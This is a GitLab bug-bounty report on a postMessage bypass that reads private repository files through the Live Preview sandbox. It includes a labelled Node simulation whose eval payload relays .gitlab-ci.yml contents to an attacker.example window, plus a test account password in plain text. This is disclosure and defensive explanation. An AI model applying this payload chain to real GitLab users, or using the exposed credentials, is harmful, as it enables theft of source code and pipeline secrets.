
Read any repo file (incl. private ones) via postMessage on both gitlab.com/self-hosted instance (bypass #1417680)

HackerOne report #1699831 by niraeth on 2022-09-14, assigned to GitLab Team:


Report

Summary

An attacker can use a specially crafted webpage to read the content of a victim's repo via postMessage when the victim uses the Live Preview feature.

The attack vector and impact are the same as in report #1417680 (CVE-2022-2907). Although it was fixed in the previous report, I have found a workaround/bypass for it.

Steps to reproduce

The reproduction below will be done on gitlab.com, but it works (and I have tested it) on self-hosted instances as well. For self-hosted instances, you will need to manually enable the Live Preview feature for the exploit to work. You can follow the guide here to enable the feature.

Reproduce for gitlab.com:

  1. Login to https://gitlab.com using the credentials: email niraeth+100@wearehackerone.com and password 89J6\U^_tV?/yY7X
  2. Go to the poc page at https://exploits.niraeth.com/sites/gitlab/postMessage%20readFile%202/readFile%203499E693D443B4E6ED4CE8D0F815F991.html
  3. Follow instructions on the poc page.

Reproduce for your own instance:

  1. Download the HTML file: readFile_3499E693D443B4E6ED4CE8D0F815F991.html
  2. Modify the URL shown below
     [screenshot: URL_to_be_modified.JPG]
  3. Follow the instructions above (Reproduce for gitlab.com)

Vulnerable Code / Bypass Details

First, take a look at the fix implemented for the previous report. You can see below that it checks the message's source, to verify that it comes from this.frameWindow. this.frameWindow is an iframe that points to https://sandbox-prod.gitlab-static.net/. $id is now also checked against this.channelId (a random integer from 100000 to 999999).
[screenshot: fix_from_prev_report.JPG]

However, because there is an XSS vulnerability at https://sandbox-prod.gitlab-static.net/, an attacker can use this XSS to call postMessage and bypass the source check. This XSS can be triggered via postMessage because of the vulnerable code shown below:

  1. This is the message event listener
     [screenshot: cframe_-1-_message_listener.JPG]

  2. Eventually, the code below gets executed. The XSS is executed by the line eval(e.command)
     [screenshot: cframe_-_2-_eval.JPG]
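To make the bypass concrete, here is an added model of the message flow (this is illustration code, not GitLab's code and not the reporter's PoC). It runs in Node with simulated windows; the origins, the FakeWindow class, and the message shapes ({ $id, type, path } on the IDE channel, { command } to the sandbox frame) are assumptions. Only the two host-side checks from the fix (event.source === this.frameWindow and $id === this.channelId) and the eval-of-a-message-field sink in the frame mirror what the report shows; the report's eval(e.command) is written as eval(e.data.command) here because the model passes raw event objects.

```javascript
// Added example, not GitLab's code: Node-runnable model of the Live Preview
// postMessage flow. FakeWindow, the origins and the message shapes are assumed.

const IDE_ORIGIN = 'https://gitlab.example';       // assumed: the Web IDE page
const SANDBOX_ORIGIN = 'https://sandbox.example';  // assumed: the Live Preview iframe
const ATTACKER_ORIGIN = 'https://attacker.example';

// Stand-in for a browser window: stores message listeners and delivers
// synchronously, filling in event.origin / event.source from the sender the
// way a browser would. Listeners are copied per dispatch so a handler added
// mid-dispatch does not receive the event that added it.
class FakeWindow {
  constructor(origin) { this.origin = origin; this.listeners = []; this.parent = null; this.opener = null; }
  addEventListener(type, fn) { if (type === 'message') this.listeners.push(fn); }
  postMessageFrom(sender, data) {
    for (const fn of [...this.listeners]) fn({ data, origin: sender.origin, source: sender });
  }
}

// Constructed repo contents the IDE host can read as the logged-in victim.
const REPO = {
  '.gitlab-ci.yml': 'deploy:\n  script: ssh deploy@prod.example "./release.sh"\n',
  'README.md': '# demo\n',
};

// IDE host page after the #1417680 fix: it answers only messages whose source
// is the preview iframe and whose $id matches the random channel id.
function makeHost(frameWindow) {
  const host = new FakeWindow(IDE_ORIGIN);
  host.channelId = 100000 + Math.floor(Math.random() * 900000);
  host.addEventListener('message', (event) => {
    if (event.source !== frameWindow) return;          // source check from the fix
    if (event.data.$id !== host.channelId) return;      // channel id check from the fix
    if (event.data.type === 'readFile' && Object.prototype.hasOwnProperty.call(REPO, event.data.path)) {
      event.source.postMessageFrom(host, {
        $id: host.channelId, type: 'file', path: event.data.path, content: REPO[event.data.path],
      });
    }
  });
  return host;
}

// Preview iframe. `hardened` swaps the eval sink for an origin-checked dispatcher.
function makeFrame(hardened) {
  const frame = new FakeWindow(SANDBOX_ORIGIN);
  frame.channelId = null;
  frame.rendered = null;
  frame.addEventListener('message', (e) => {
    if (hardened) {
      // Only the embedding IDE page may talk to the sandbox, and messages are
      // dispatched by type, never executed.
      if (e.origin !== IDE_ORIGIN || e.source !== frame.parent) return;
      if (e.data.type === 'init') frame.channelId = e.data.$id;
      else if (e.data.type === 'file') frame.rendered = e.data.content;
      return;
    }
    // Shape of the vulnerable listener from the report: no origin check, and
    // whatever arrives in `command` runs in the sandbox's own origin.
    if (e.data.type === 'init') frame.channelId = e.data.$id;
    if (typeof e.data.command === 'string') eval(e.data.command);
  });
  return frame;
}

// What the attacker evals inside the frame: relay any file reply to the
// attacker's window (reachable as parent.opener), then ask the host for a file.
// The request is sent by the frame itself, so source and $id both check out.
const PAYLOAD = `
  frame.addEventListener('message', (ev) => {
    if (ev.data.type === 'file') frame.parent.opener.postMessageFrom(frame, ev.data);
  });
  frame.parent.postMessageFrom(frame, { $id: frame.channelId, type: 'readFile', path: '.gitlab-ci.yml' });
`;

// Wires attacker page -> (opened) IDE window -> preview iframe, and returns the
// messages that reached the attacker's page.
function runScenario(hardened) {
  const attacker = new FakeWindow(ATTACKER_ORIGIN);
  const frame = makeFrame(hardened);
  const host = makeHost(frame);
  host.opener = attacker;   // the IDE window was opened by the attacker's page
  frame.parent = host;      // the preview iframe is embedded in the IDE page
  frame.postMessageFrom(host, { type: 'init', $id: host.channelId });  // host shares the channel id
  const leaked = [];
  attacker.addEventListener('message', (ev) => leaked.push(ev.data));
  frame.postMessageFrom(attacker, { command: PAYLOAD });  // attacker's page -> iframe
  return leaked;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log('vulnerable frame leaked:', runScenario(false).map((m) => m.path));
  console.log('hardened frame leaked:', runScenario(true).map((m) => m.path));
}
```

The point the model makes: adding an event.origin check on the IDE host would not help, because the forged request really does come from the sandbox frame at its legitimate origin. The host's source and channel id checks are only as strong as the frame they trust, so the frame has to stop executing message content and verify its own sender (origin and parent) before acting on anything.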

Impact

  1. Read files of a private repo - steal source code etc.
  2. Read sensitive files such as .gitlab-ci.yml, which is almost guaranteed to contain things like API keys and SSH keys that are necessary for the pipeline to work. This would then enable an attacker to further their attack, e.g. gaining remote access to a server.

Examples

The repo used for this PoC is available at https://gitlab.com/nicgene/vue-todo . However, any other project/repo that is properly configured for the Live Preview feature would work too.
Note that the above repo is not controlled by me.

What is the current bug behavior?

The attacker is able to read repository files.

What is the expected correct behavior?

The attacker should not be able to communicate with the message event listener.

Relevant logs and/or screenshots

Nil. Refer to the section Vulnerable Code / Bypass Details for screenshots of the affected code.

Output of checks

This bug happens on GitLab.com and Self Hosted GitLab

Results of GitLab environment info
System information  
System:         Ubuntu 20.04  
Current User:   git  
Using RVM:      no  
Ruby Version:   2.7.5p203  
Gem Version:    3.1.6  
Bundler Version:2.3.15  
Rake Version:   13.0.6  
Redis Version:  6.2.7  
Sidekiq Version:6.4.0  
Go Version:     unknown

GitLab information  
Version:        15.3.3  
Revision:       c629a47f87f  
Directory:      /opt/gitlab/embedded/service/gitlab-rails  
DB Adapter:     PostgreSQL  
DB Version:     13.6  
URL:            http://ec2-13-228-76-134.ap-southeast-1.compute.amazonaws.com  
HTTP Clone URL: http://ec2-13-228-76-134.ap-southeast-1.compute.amazonaws.com/some-group/some-project.git  
SSH Clone URL:  git@ec2-13-228-76-134.ap-southeast-1.compute.amazonaws.com:some-group/some-project.git  
Using LDAP:     no  
Using Omniauth: yes  
Omniauth Providers:

GitLab Shell  
Version:        14.10.0  
Repository storage paths:  
- default:      /var/opt/gitlab/git-data/repositories  
GitLab Shell path:              /opt/gitlab/embedded/service/gitlab-shell  

Impact

Mentioned in the report.

Attachments

Warning: Attachments received through HackerOne, please exercise caution!

How To Reproduce

Please add reproducibility information to this section: